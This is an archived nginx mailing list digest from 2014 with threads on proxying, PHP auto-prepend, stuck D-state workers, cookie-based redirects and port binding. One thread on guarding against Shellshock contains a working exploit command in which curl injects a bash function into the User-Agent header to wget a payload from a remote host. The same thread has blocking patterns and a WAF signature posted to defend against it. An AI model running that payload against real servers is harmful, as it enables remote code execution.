> > If you insist on using proxy_store I would probably also add > proxy_ignore_client_abort on; ( http://nginx.org/en/docs/http/ > ngx_http_proxy_module.html#proxy_ignore_client_abort ) to the nginx > configuration. So the requests don't get repeated if the client > closes/aborts the request early etc. > > rr > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From thunderhill4 at gmail.com Thu Sep 25 19:50:18 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Fri, 26 Sep 2014 01:20:18 +0530 Subject: Rewriting location directive by upstream servers Message-ID: Hi, I have two back end application servers behind nginx. The configuration is as follows: upstream backend1 { server 10.1.1.11; } upstream backend2 { server 10.2.2.2; } server { listen 80; server_name mysite.com; location /app1 { # proxy_set_header X-Real-IP $remote_addr; proxy_pass https://backend1/; } location /app2 { proxy_pass https://backend2/; } } When I access mysite.com/app1 the upstream server rewrites the url like mysite.com/login instead of mysite.com/app1/login and the result is a blank page. Users are allowed either mysite.com/app1 or mysite.com/app2. In both cases app1 and app2 are getting rewritten with login or some other extension. How can I solve this issue? Regards T -------------- next part -------------- An HTML attachment was scrubbed...
URL: From francis at daoine.org Thu Sep 25 21:05:52 2014 From: francis at daoine.org (Francis Daly) Date: Thu, 25 Sep 2014 22:05:52 +0100 Subject: Rewriting location directive by upstream servers In-Reply-To: References: Message-ID: <20140925210552.GP3771@daoine.org> On Fri, Sep 26, 2014 at 01:20:18AM +0530, thunder hill wrote: Hi there, > When I access mysite.com/app1 the upstream server rewrites the url like > mysite.com/login instead of mysite.com/app1/login and the result is a > blank page. > > Users are allowed either mysite.com/app1 or mysite.com/app2. In both the > cases app1 and app2 are getting rewritten with login or some other > extension. How to solve this issue.? I believe that the easiest way, if you want both to be available via the same hostname, is to install-or-configure app1 on backend1 to be available below the url /app1/, not below /. And do something similar for app2. And then remove the final "/" in your proxy_pass directives. f -- Francis Daly francis at daoine.org From francis at daoine.org Thu Sep 25 21:28:46 2014 From: francis at daoine.org (Francis Daly) Date: Thu, 25 Sep 2014 22:28:46 +0100 Subject: prepend a php script in all requests In-Reply-To: <5424596A.4060708@gmail.com> References: <5424596A.4060708@gmail.com> Message-ID: <20140925212846.GQ3771@daoine.org> On Thu, Sep 25, 2014 at 12:05:30PM -0600, Alex Flex wrote: Hi there, > Once i have nginx installed with php fastcgi. Is it possible to > preppend a php script to be executed when serving any request? > (similar to apache prepend function). That sounds like it should be a feature of your fastcgi server or your php runtime, rather than nginx. I suggest searching for "fastcgi prepend" or "php prepend" in your favourite search engine. f -- Francis Daly francis at daoine.org From r at roze.lv Thu Sep 25 21:36:51 2014 From: r at roze.lv (Reinis Rozitis) Date: Fri, 26 Sep 2014 00:36:51 +0300 Subject: Forward single request to upstream server via proxy_store !! 
In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: > It will also prevent users seeking the video because the arguments after > "?" will remove whenever user will try to seek the video stream, isn't it > ? In general it shouldn't since the "?start=" is handled by nginx and not varnish, but I'm not exactly sure how the mp4 module of nginx handles a proxied request. You have to test it. In worst case scenario imho only the first request (before landing on the proxy_store server) will "fail" eg play from the beginning instead of the time set. > Well, only proxy_store is able to fulfill my requirements that is the > reason i'll have to stick with it. Well you can try to use varnish as the streamer, just need some (web)player supporting byte-range requests for the seeking ( http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). > I am bit confused about the varnish. Actually, i don't need any kind of > caching within the varnish as nginx already doing it via proxy_store. I > just need varnish to merge the subsequent requests into 1 and forward it > to nginx and i think varnish is doing it pretty well. Nevertheless, i am > confused if malloc caching will have any odd effect on the stream behavior > ? You can try to pass the request without caching: sub vcl_fetch { return (pass); } (maybe even do it in the vcl_recv stage but again I'm not exactly sure if in that case the request coalescing works). rr From r at roze.lv Thu Sep 25 21:44:47 2014 From: r at roze.lv (Reinis Rozitis) Date: Fri, 26 Sep 2014 00:44:47 +0300 Subject: prepend a php script in all requests In-Reply-To: <5424596A.4060708@gmail.com> References: <5424596A.4060708@gmail.com> Message-ID: > Once i have nginx installed with php fastcgi.
Is it possible to prepend a > php script to be executed when serving any request? (similar to apache > prepend function). If yes could I please have an example. Thanks PHP itself has such functionality: http://php.net/manual/en/ini.core.php#ini.auto-prepend-file . If you want to change it from nginx you can add the following line to your particular php/fastcgi block: fastcgi_param PHP_VALUE "auto_prepend_file=/path/to/your/file.php"; rr From thunderhill4 at gmail.com Fri Sep 26 04:42:47 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Fri, 26 Sep 2014 10:12:47 +0530 Subject: Rewriting location directive by upstream servers In-Reply-To: <20140925210552.GP3771@daoine.org> References: <20140925210552.GP3771@daoine.org> Message-ID: Hi, On Fri, Sep 26, 2014 at 2:35 AM, Francis Daly wrote: > On Fri, Sep 26, 2014 at 01:20:18AM +0530, thunder hill wrote: > > Hi there, > > > When I access mysite.com/app1 the upstream server rewrites the url like > > mysite.com/login instead of mysite.com/app1/login and the result is a > > blank page. > > > > Users are allowed either mysite.com/app1 or mysite.com/app2. In both the > > cases app1 and app2 are getting rewritten with login or some other > > extension. How to solve this issue.? > > I believe that the easiest way, if you want both to be available via > the same hostname, is to install-or-configure app1 on backend1 to be > available below the url /app1/, not below /. > > And do something similar for app2. > > And then remove the final "/" in your proxy_pass directives. > That's the easiest way. Unfortunately there is no control over the backend server(s). Just a thought: Is there a way to keep the url mysite.com/app1 and go on with mysite.com/app1/login? That means the backend server can only rewrite the strings after mysite.com/app1. Or are there any other ways? Regards T -------------- next part -------------- An HTML attachment was scrubbed...
URL: From zhangqiang.buaa at gmail.com Fri Sep 26 07:45:40 2014 From: zhangqiang.buaa at gmail.com (Zhang Qiang) Date: Fri, 26 Sep 2014 15:45:40 +0800 Subject: Nginx run into Stat D Message-ID: Hi community, We are using Nginx as a static HTTP server to cache/send small static files. The average file size is about 10k ~ 200k, and the nginx server can process ~10000 requests per second. It runs well, but sometimes most of the nginx workers go into state D, and there's no way to kill them except restarting the system. Here's the call stack for kernel/user space: With AIO enabled -----Kernel Space Call Stack----- 0xffffffff8111f700 : sync_page+0x0/0x50 [kernel] 0xffffffff8111f75e : sync_page_killable+0xe/0x40 [kernel] 0xffffffff81529e7a : __wait_on_bit_lock+0x5a/0xc0 [kernel] 0xffffffff8111f667 : __lock_page_killable+0x67/0x70 [kernel] 0xffffffff81121394 : generic_file_aio_read+0x4b4/0x700 [kernel] 0xffffffff811d58d4 : aio_rw_vect_retry+0x84/0x200 [kernel] 0xffffffff811d7294 : aio_run_iocb+0x64/0x170 [kernel] 0xffffffff811d86c1 : do_io_submit+0x291/0x920 [kernel] 0xffffffff811d8d60 : sys_io_submit+0x10/0x20 [kernel] 0xffffffff8100b288 : tracesys+0xd9/0xde [kernel] -----User Space Call Stack----- 0x3c362e50c9 : syscall+0x19/0x40 [/lib64/libc-2.12.so] 0x4d2232 : ngx_linux_sendfile_chain+0xc2a/0xc2c [/opt/soft/nginx/sbin/nginx] 0x4d24ea : ngx_file_aio_read+0x2b6/0x528 [/opt/soft/nginx/sbin/nginx] 0x515247 : ngx_http_file_cache_open+0xbef/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514df6 : ngx_http_file_cache_open+0x79e/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514abb : ngx_http_file_cache_open+0x463/0x1437 [/opt/soft/nginx/sbin/nginx] 0x5033d0 : ngx_http_upstream_init+0xbc5/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x502916 : ngx_http_upstream_init+0x10b/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x5028ad : ngx_http_upstream_init+0xa2/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x4f8313 : ngx_http_read_client_request_body+0x117/0xd1c [/opt/soft/nginx/sbin/nginx] 0x5351da : ngx_http_ssi_map_uri_to_path+0x1aff0/0x3a5e0
[/opt/soft/nginx/sbin/nginx] 0x4df55b : ngx_http_core_content_phase+0x41/0x1c9 [/opt/soft/nginx/sbin/nginx] 0x4de484 : ngx_http_core_run_phases+0x87/0xc2 [/opt/soft/nginx/sbin/nginx] 0x4de3fb : ngx_http_handler+0x1c3/0x1c5 [/opt/soft/nginx/sbin/nginx] 0x4ec468 : ngx_http_process_request+0x304/0xa98 [/opt/soft/nginx/sbin/nginx] 0x4eaed8 : ngx_http_process_request_uri+0x95e/0x1876 [/opt/soft/nginx/sbin/nginx] 0x4ea414 : ngx_http_ssl_servername+0x6d5/0x83b [/opt/soft/nginx/sbin/nginx] 0x4e94ea : ngx_http_init_connection+0x785/0x78f [/opt/soft/nginx/sbin/nginx] 0x4d11b3 : ngx_os_specific_status+0xe55/0x12aa [/opt/soft/nginx/sbin/nginx] 0x4c3e5a : ngx_process_events_and_timers+0xd6/0x165 [/opt/soft/nginx/sbin/nginx] Without AIO enabled: -----Kernel Space Call Stack----- 0xffffffff8111f700 : sync_page+0x0/0x50 [kernel] 0xffffffff8111f75e : sync_page_killable+0xe/0x40 [kernel] 0xffffffff81529e7a : __wait_on_bit_lock+0x5a/0xc0 [kernel] 0xffffffff8111f667 : __lock_page_killable+0x67/0x70 [kernel] 0xffffffff81121394 : generic_file_aio_read+0x4b4/0x700 [kernel] 0xffffffff81188c8a : do_sync_read+0xfa/0x140 [kernel] 0xffffffff81189645 : vfs_read+0xb5/0x1a0 [kernel] 0xffffffff81189972 : sys_pread64+0x82/0xa0 [kernel] 0xffffffff8100b288 : tracesys+0xd9/0xde [kernel] -----User Space Call Stack----- 0x3c36e0f043 : __pread_nocancel+0xa/0x67 [/lib64/libpthread-2.12.so] 0x4c9ab1 : ngx_read_file+0x35/0xb9 [/opt/soft/nginx/sbin/nginx] 0x5152e9 : ngx_http_file_cache_open+0xc91/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514df6 : ngx_http_file_cache_open+0x79e/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514abb : ngx_http_file_cache_open+0x463/0x1437 [/opt/soft/nginx/sbin/nginx] 0x5033d0 : ngx_http_upstream_init+0xbc5/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x502916 : ngx_http_upstream_init+0x10b/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x5028ad : ngx_http_upstream_init+0xa2/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x4f8313 : ngx_http_read_client_request_body+0x117/0xd1c [/opt/soft/nginx/sbin/nginx] 0x5351da : 
ngx_http_ssi_map_uri_to_path+0x1aff0/0x3a5e0 [/opt/soft/nginx/sbin/nginx] 0x4df55b : ngx_http_core_content_phase+0x41/0x1c9 [/opt/soft/nginx/sbin/nginx] 0x4de484 : ngx_http_core_run_phases+0x87/0xc2 [/opt/soft/nginx/sbin/nginx] 0x4de3fb : ngx_http_handler+0x1c3/0x1c5 [/opt/soft/nginx/sbin/nginx] 0x4ec468 : ngx_http_process_request+0x304/0xa98 [/opt/soft/nginx/sbin/nginx] 0x4eaed8 : ngx_http_process_request_uri+0x95e/0x1876 [/opt/soft/nginx/sbin/nginx] 0x4ea414 : ngx_http_ssl_servername+0x6d5/0x83b [/opt/soft/nginx/sbin/nginx] 0x4e94ea : ngx_http_init_connection+0x785/0x78f [/opt/soft/nginx/sbin/nginx] 0x4d11b3 : ngx_os_specific_status+0xe55/0x12aa [/opt/soft/nginx/sbin/nginx] 0x4c3e5a : ngx_process_events_and_timers+0xd6/0x165 [/opt/soft/nginx/sbin/nginx] 0x4cf1a3 : ngx_single_process_cycle+0x1053/0x2114 [/opt/soft/nginx/sbin/nginx] Is anyone see these issue (pending on Stat D) before? how can I resolve it? it seems that not the kernel issue. I have done some basic statistics in 3 seconds: Kernel function: call times sync_page: 91 sync_buffer:2 generic_file_aio_read: 3240 sys_read: 3240 sys_write: 698 Thanks Qiang -------------- next part -------------- An HTML attachment was scrubbed... URL: From Pekka.Panula at sofor.fi Fri Sep 26 08:01:08 2014 From: Pekka.Panula at sofor.fi (Pekka.Panula at sofor.fi) Date: Fri, 26 Sep 2014 11:01:08 +0300 Subject: Shellshock protection using nginx ? Message-ID: Hi I have seen eg. Netscaler response policy which can detect if someone is trying shellshock bug using http headers. I am using nginx as reverse proxy so is there good way to make a similar protection using nginx features? eg. checking http headers and drop/return 404 if shellshock code is detected? Regards, Pekka Panula -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From nginx-forum at nginx.us Fri Sep 26 09:14:40 2014 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 26 Sep 2014 05:14:40 -0400 Subject: Shellshock protection using nginx ? In-Reply-To: References: Message-ID: Untested but should work; between http {} map $request $shellshockblock { default 0; ~*\:\; 1; ~*ping 1; ~*\/bash 1; } inside location {} if ($shellshockblock) { return 412; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253553,253554#msg-253554 From nginx-forum at nginx.us Fri Sep 26 09:16:02 2014 From: nginx-forum at nginx.us (mex) Date: Fri, 26 Sep 2014 05:16:02 -0400 Subject: Shellshock protection using nginx ? In-Reply-To: References: Message-ID: hi pekka, since the attack, esp. against CGI, is possible through (custom) headers/cookies etc you'd need some waf-functionalities (afaik) naxsi, an nginx-based waf, has a signature for this since wednesday MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz:BODY|HEADERS" "s:$ATTACK:8" id:42000393 ; http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253553,253555#msg-253555 From nginx-forum at nginx.us Fri Sep 26 09:23:04 2014 From: nginx-forum at nginx.us (mex) Date: Fri, 26 Sep 2014 05:23:04 -0400 Subject: Shellshock protection using nginx ? 
In-Reply-To: References: Message-ID: <18496faa6d39eae1dda3cbd55f45e916.NginxMailingListEnglish@forum.nginx.org> curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O /tmp/nastyexe http://myserver.com/nastyexe' https://target.com/cgi-bin/hi :D If so, you should try to match for the (regex) pattern "\(\) {" #since this must be written like this; an additional space between "() {" would render the exploit non-functional. Furthermore: you are missing all headers; attacks i've seen so far worked against - UA - cookies - custom headers customized attacks might work via POST-BODY too, but this is yet not confirmed Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253553,253557#msg-253557 From nginx-forum at nginx.us Fri Sep 26 13:43:59 2014 From: nginx-forum at nginx.us (jamel) Date: Fri, 26 Sep 2014 09:43:59 -0400 Subject: Underscore between variables Message-ID: <274582502d1956bd363953a47440ff8c.NginxMailingListEnglish@forum.nginx.org> Hello, I'm trying to rewrite a URL with parameters x, y, z to a filename using this template: file_{x}_{y}_{z}.txt location /path { rewrite ^ /path/file_$arg_x_$arg_y_$arg_z.txt break; root /var/www; } But it is not working, because nginx tries to use the variables x_, y_. How can I use the underscore symbol to separate variables? In bash there is a curly brackets style for such cases: ${x}_${y}_${z}. Maybe nginx has something special for this too.
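If nginx honours the same brace-delimited style, the rewrite would presumably look like this (an untested guess on my part, using the same /path and /var/www as above):

```nginx
location /path {
    # ${...} marks where each variable name ends, so the literal
    # underscores are no longer swallowed into the variable name
    rewrite ^ /path/file_${arg_x}_${arg_y}_${arg_z}.txt break;
    root /var/www;
}
```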
-- Sergey Polovko Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253560,253560#msg-253560 From francis at daoine.org Fri Sep 26 14:11:19 2014 From: francis at daoine.org (Francis Daly) Date: Fri, 26 Sep 2014 15:11:19 +0100 Subject: Underscore between variables In-Reply-To: <274582502d1956bd363953a47440ff8c.NginxMailingListEnglish@forum.nginx.org> References: <274582502d1956bd363953a47440ff8c.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140926141119.GR3771@daoine.org> On Fri, Sep 26, 2014 at 09:43:59AM -0400, jamel wrote: Hi there, > location /path { > rewrite ^ /path/file_$arg_x_$arg_y_$arg_z.txt break; > root /var/www; > } > > But it is not working. Because nginx tries to use variables x_, y_. Does it? Or does it try to use variables arg_x_ and arg_y_? > How can I use underscore symbol to separate variables? > > In bash there is curly brackets style for such cases: ${x}_${y}_${z}. > May be nginx has something special for this too. Yes. Curly brackets. f -- Francis Daly francis at daoine.org From marcello.rocha at vagas.com.br Fri Sep 26 17:02:12 2014 From: marcello.rocha at vagas.com.br (Marcello Rocha) Date: Fri, 26 Sep 2014 14:02:12 -0300 Subject: Weird behavior when checking the existence of a cookie Message-ID: Hi list, this is my first post here, so If I commit any blunder please let me know. I have this location block: location /some_path/ { # this sets the mobile_rewrite variable based on a regex against the user_agent include /etc/nginx/mobile; # This is where the trouble lies. =/ if ($cookie_mobileBypassDaily = yes_please) { set $mobile_rewrite do_not_perform; } if ($mobile_rewrite = perform) { return 302 $scheme://my.site.com/some_path/fallback_mobile.html; break; } # upstream/ to remove the /some_path/ part of the uri proxy_pass http://upstream/; } And now to the trouble at hand: if there is no cookie the proxy_pass is executed rightly (ie. http://my.server.com/some_path/thing => http://upstream/thing). 
If the cookie exists the proxy_pass not only has the some_path part of the url but it also has an extraneous slash (ie. http://my.server.com/some_path/thing => http://upstream//some_path/thing). Why is this happening? What am I doing wrong besides, maybe, everything? =) Thanks for the help *Marcello Rocha* Pesquisa & Desenvolvimento (11) 4084.1111 ou (xx) 4007.1547 -------------- next part -------------- An HTML attachment was scrubbed... URL: From wandenberg at gmail.com Fri Sep 26 17:11:57 2014 From: wandenberg at gmail.com (Wandenberg Peixoto) Date: Fri, 26 Sep 2014 14:11:57 -0300 Subject: Weird behavior when checking the existence of a cookie In-Reply-To: References: Message-ID: By default the $uri is appended to the proxy_pass directive. Since you defined it as proxy_pass http://upstream/; and the $uri starts with a slash you will have a double slash. Try to set it like proxy_pass http://upstream; (without the trailing slash). On Fri, Sep 26, 2014 at 2:02 PM, Marcello Rocha wrote: > Hi list, this is my first post here, so If I commit any blunder please let > me know. > > I have this location block: > > location /some_path/ { > # this sets the mobile_rewrite variable based on a regex against > the user_agent > include /etc/nginx/mobile; > > # This is where the trouble lies. =/ > if ($cookie_mobileBypassDaily = yes_please) { > set $mobile_rewrite do_not_perform; > } > > if ($mobile_rewrite = perform) { > return 302 $scheme:// > my.site.com/some_path/fallback_mobile.html; > break; > } > # upstream/ to remove the /some_path/ part of the uri > proxy_pass http://upstream/; > } > > > And now to the trouble at hand: if there is no cookie the proxy_pass is > executed rightly (ie. http://my.server.com/some_path/thing => > http://upstream/thing). If the cookie exists the proxy_pass not only has > the some_path part of the url but it also has an extraneous slash (ie. > http://my.server.com/some_path/thing => http://upstream//some_path/thing). > > Why is this happening?
What I'm doing wrong besides, maybe, everything? =) > > Thanks for the help > > *Marcello Rocha* > Pesquisa & Desenvolvimento > > (11) 4084.1111 ou (xx) 4007.1547 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 26 22:55:31 2014 From: nginx-forum at nginx.us (matt_l) Date: Fri, 26 Sep 2014 18:55:31 -0400 Subject: lua_shared_dict Message-ID: <2a573e42ae5956c23fd5df352e7e4b70.NginxMailingListEnglish@forum.nginx.org> Hello I am using http://wiki.nginx.org/HttpLuaModule#lua_shared_dict I am storing a set of ids. local a_uuid = "... a_dict.set(a_dict, a_uuid, a_uuid) Ideally it would be more efficient for my use case to have lua_shared_set or lua_shared_bloom_filter Has anyone encountered/implemented a shared bloom filter or shared set in nginx? On a separate note, if I were to store 128 bits (16 bytes) for the key and 128 bits for the value, I would imagine that a record would take size(key) + size(value) = 32 bytes of memory. If I want 100 million records I imagine I need 3.2GB of memory. Can I safely (provided the machine has enough memory) define lua_shared_dict a_dict 3200m? Thank you for your help Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253565,253565#msg-253565 From shahzaib.cb at gmail.com Sat Sep 27 05:41:58 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Sat, 27 Sep 2014 10:41:58 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: >>In general it shouldn't since the "?start="
is handled by nginx and not varnish, but I'm not exactly sure how the mp4 module of nginx handles a proxied request. You have to test it. Sure, i'll test it. sub vcl_fetch { return (pass); } You're right about return(pass), coalescing doesn't work with pass. >>In worst case scenario imho only the first request (before landing on the proxy_store server) will "fail" eg play from the beginning instead of the time set. Well, I am facing a worse scenario: the first request always fails to stream and the player (HTML5) keeps on loading. I'm already checking if there's some config issue with varnish or this is the default behaviour (which I don't think it is). Thanks @RR Shahzaib On Fri, Sep 26, 2014 at 2:36 AM, Reinis Rozitis wrote: > It will also prevent users seeking the video because the arguments after >> "?" will remove whenever user will try to seek the video stream, isn't it ? >> > > In general it shouldn't since the "?start=" is handled by nginx and not > varnish, but I'm not exactly sure how the mp4 module of nginx handles a > proxied request. > You have to test it. > > In worst case scenario imho only the first request (before landing on the > proxy_store server) will "fail" eg play from the beginning instead of the > time set. > > > > Well, only proxy_store is able to fulfill my requirements that is the >> reason i'll have to stick with it. >> > > Well you can try to use varnish as the streamer, just need some > (web)player supporting byte-range requests for the seeking ( > http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). > > > I am bit confused about the varnish. Actually, i don't need any kind of >> caching within the varnish as nginx already doing it via proxy_store. I >> just need varnish to merge the subsequent requests into 1 and forward it > to nginx and i think varnish is doing it pretty well. Nevertheless, i am >> confused if malloc caching will have any odd effect on the stream behavior ?
>> > > > You can try to pass the request without caching: > > sub vcl_fetch { > return (pass); > } > > (maybe even do it in the vcl_recv stage but again I'm not exactly sure if > in that case the request coalescing works). > > > > rr > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Sat Sep 27 18:24:00 2014 From: nginx-forum at nginx.us (paulswansea) Date: Sat, 27 Sep 2014 14:24:00 -0400 Subject: Unable to use custom variable with limit_conn_zone Message-ID: <3ad16acd346b4325dbe1eeeaa62cc5f3.NginxMailingListEnglish@forum.nginx.org> I am trying to use the limit connections / limit request. I have the server behind a proxy, the proxy has the following line : proxy_set_header X-Real-IP $remote_addr; and in my nginx.conf on my server behind the proxy i have : limit_conn_zone $http_x_real_ip zone=perip:10m; limit_conn perip 20; limit_req_zone $http_x_real_ip zone=forward:10m rate=60r/m; However, when checking my logs, I get the internal address of the proxy server listed, not the external real ip : 2014/09/27 13:45:16 [error] 57287#0: *29475 limiting requests, excess: 30.536 by zone "forward", client: 10.120.23.133 Can you see an issue with my configuration, or is there a bug with nginx in respect to using custom variables? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253572,253572#msg-253572 From vbart at nginx.com Sat Sep 27 19:56:12 2014 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Sat, 27 Sep 2014 23:56:12 +0400 Subject: Unable to use custom variable with limit_conn_zone In-Reply-To: <3ad16acd346b4325dbe1eeeaa62cc5f3.NginxMailingListEnglish@forum.nginx.org> References: <3ad16acd346b4325dbe1eeeaa62cc5f3.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1933883.37J5iKlGLf@vbart-laptop> On Saturday 27 September 2014 14:24:00 paulswansea wrote: > I am trying to use the limit connections / limit request. I have the server > behind a proxy, the proxy has the following line : > > proxy_set_header X-Real-IP $remote_addr; > > and in my nginx.conf on my server behind the proxy i have : > > limit_conn_zone $http_x_real_ip zone=perip:10m; > limit_conn perip 20; > limit_req_zone $http_x_real_ip zone=forward:10m rate=60r/m; > > However, when checking my logs, I get the internal address of the proxy > server listed, not the external real ip : > > 2014/09/27 13:45:16 [error] 57287#0: *29475 limiting requests, excess: > 30.536 by zone "forward", client: 10.120.23.133 > > Can you see an issue with my configuration, or is there a bug with nginx in > respect to using custom variables? > [..] The IPs in log messages aren't related to the variable from the limit zone, so there's no problem. But if you want to see the IP from the header in the logs, then you should configure the realip module: http://nginx.org/en/docs/http/ngx_http_realip_module.html wbr, Valentin V. Bartenev From jeremypiven at fastmail.fm Sun Sep 28 20:51:22 2014 From: jeremypiven at fastmail.fm (Jeremy Piven) Date: Sun, 28 Sep 2014 13:51:22 -0700 Subject: modify response code based on upstream response Message-ID: <1411937482.1003029.172703649.7459AFF8@webmail.messagingengine.com> I have a set of webservers with nginx acting as a reverse proxy for tomcat behind an AWS ELB. Request -> AWS ELB -> Nginx -> Tomcat To understand if my application is healthy or not I have to send a request for /status/health. If "health:0" comes back it means the server is not ready to serve traffic.
If "health:1" comes back it means the server is ready to serve traffic. Unfortunately, in both scenarios the http response code is always 200. Since AWS ELB has a dumb healthcheck method I can't place a server in or out of rotation based on the actual response output. AWS only considers http response code. Is it possible to have Nginx modify the http response code based on the upstream output? I want to basically say if the tomcat response is "health:0" return an http response code 503. -- Jeremy Piven jeremypiven at fastmail.fm From nginx-forum at nginx.us Sun Sep 28 22:15:53 2014 From: nginx-forum at nginx.us (mert1972) Date: Sun, 28 Sep 2014 18:15:53 -0400 Subject: nginx cannot listen to port 8090 Message-ID: <6a00a3bbae95b96f5d78d4977c27f71c.NginxMailingListEnglish@forum.nginx.org> Hello all, I am trying to enable nginx to listen to port 8090 via default.conf file under /etc/nginx/conf.d directory but it fails with following error : -- Unit nginx.service has begun starting up. Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: the configuration file /etc/nginx/nginx.conf syntax is ok Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: [emerg] bind() to 0.0.0.0:8090 failed (13: Permission denied) Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: configuration file /etc/nginx/nginx.conf test failed Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: nginx.service: control process exited, code=exited status=1 Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Failed to start nginx - high performance web server. -- Subject: Unit nginx.service has failed -- Defined-By: systemd -- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel -- -- Unit nginx.service has failed. -- -- The result is failed. Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Unit nginx.service entered failed state. 
[root at spidrproxy conf.d]# default.conf file is as below : server { listen 8090; server_name 47.168.136.70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # #location ~ \.php$ { # proxy_pass http://127.0.0.1; #} # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253578#msg-253578 From vsjcfm at gmail.com Mon Sep 29 04:45:03 2014 From: vsjcfm at gmail.com (Anton Sayetsky) Date: Mon, 29 Sep 2014 07:45:03 +0300 Subject: nginx cannot listen to port 8090 In-Reply-To: <6a00a3bbae95b96f5d78d4977c27f71c.NginxMailingListEnglish@forum.nginx.org> References: <6a00a3bbae95b96f5d78d4977c27f71c.NginxMailingListEnglish@forum.nginx.org> Message-ID: Looks like SELinux/AppArmor problem. 2014-09-29 1:15 GMT+03:00 mert1972 : > Hello all, > > I am trying to enable nginx to listen to port 8090 via default.conf file > under /etc/nginx/conf.d directory but it fails with following error : > > -- Unit nginx.service has begun starting up. 
> Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: the > configuration file /etc/nginx/nginx.conf syntax is ok > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: [emerg] > bind() to 0.0.0.0:8090 failed (13: Permission denied) > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com nginx[7284]: nginx: > configuration file /etc/nginx/nginx.conf test failed > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: nginx.service: > control process exited, code=exited status=1 > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Failed to start > nginx - high performance web server. > -- Subject: Unit nginx.service has failed > -- Defined-By: systemd > -- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel > -- > -- Unit nginx.service has failed. > -- > -- The result is failed. > Sep 29 01:13:58 spidrproxy.netas.lab.nortel.com systemd[1]: Unit > nginx.service entered failed state. > > [root at spidrproxy conf.d]# > > > default.conf file is as below : > > server { > listen 8090; > server_name 47.168.136.70; > > #charset koi8-r; > #access_log /var/log/nginx/log/host.access.log main; > > location / { > root /usr/share/nginx/html; > index index.html index.htm; > } > > #error_page 404 /404.html; > > # redirect server error pages to the static page /50x.html > # > error_page 500 502 503 504 /50x.html; > location = /50x.html { > root /usr/share/nginx/html; > } > > # proxy the PHP scripts to Apache listening on 127.0.0.1:80 > # > #location ~ \.php$ { > # proxy_pass http://127.0.0.1; > #} > > # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 > # > #location ~ \.php$ { > # root html; > # fastcgi_pass 127.0.0.1:9000; > # fastcgi_index index.php; > # 